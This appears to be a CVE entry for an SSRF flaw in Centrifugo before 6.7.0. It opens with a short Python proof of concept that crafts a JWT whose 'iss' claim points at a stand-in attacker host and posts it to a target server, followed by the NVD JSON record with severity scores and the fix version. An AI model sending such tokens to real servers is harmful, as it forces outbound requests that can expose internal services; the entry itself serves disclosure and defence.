CVE-2026-32301

# Conceptual PoC - JWT with malicious iss claim # Note: This is for educational/security research purposes only import jwt import requests # Example JWT structure demonstrating the attack vector # The 'iss' field contains a malicious URL that will be interpolated malicious_token = jwt.encode( { 'iss': 'http://attacker-controlled-server.com/.well-known/jwks.json', 'aud': '{{internal_service}}', 'exp': 9999999999, 'sub': 'test' }, 'dummy_key', algorithm='RS256' ) # The server will make a request to the attacker-controlled URL # before validating the token signature response = requests.post( 'https://target-centrifugo-server/api/connect', json={'token': malicious_token} )

{"cve": {"id": "CVE-2026-32301", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:41.477", "lastModified": "2026-03-18T18:02:29.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Centrifugo is an open-source scalable real-time messaging server. Prior to 6.7.0, Centrifugo is vulnerable to Server-Side Request Forgery (SSRF) when configured with a dynamic JWKS endpoint URL using template variables (e.g. {{tenant}}). An unauthenticated attacker can craft a JWT with a malicious iss or aud claim value that gets interpolated into the JWKS fetch URL before the token signature is verified, causing Centrifugo to make an outbound HTTP request to an attacker-controlled destination. This vulnerability is fixed in 6.7.0."}, {"lang": "es", "value": "Centrifugo es un servidor de mensajería en tiempo real escalable de código abierto. Antes de la versión 6.7.0, Centrifugo es vulnerable a la falsificación de petición del lado del servidor (SSRF) cuando se configura con una URL de endpoint JWKS dinámica utilizando variables de plantilla (p. ej., {{tenant}}). Un atacante no autenticado puede crear un JWT con un valor de reclamación 'iss' o 'aud' malicioso que se interpola en la URL de obtención de JWKS antes de que se verifique la firma del token, lo que hace que Centrifugo realice una petición HTTP saliente a un destino controlado por el atacante. Esta vulnerabilidad se corrige en la versión 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centrifugal:centrifugo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.7.0", "matchCriteriaId": "FFE4B883-6865-417B-B19A-92020BB6F2BB"}]}]}], "references": [{"url": "https://github.com/centrifugal/centrifugo/security/advisories/GHSA-j77h-rr39-c552", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}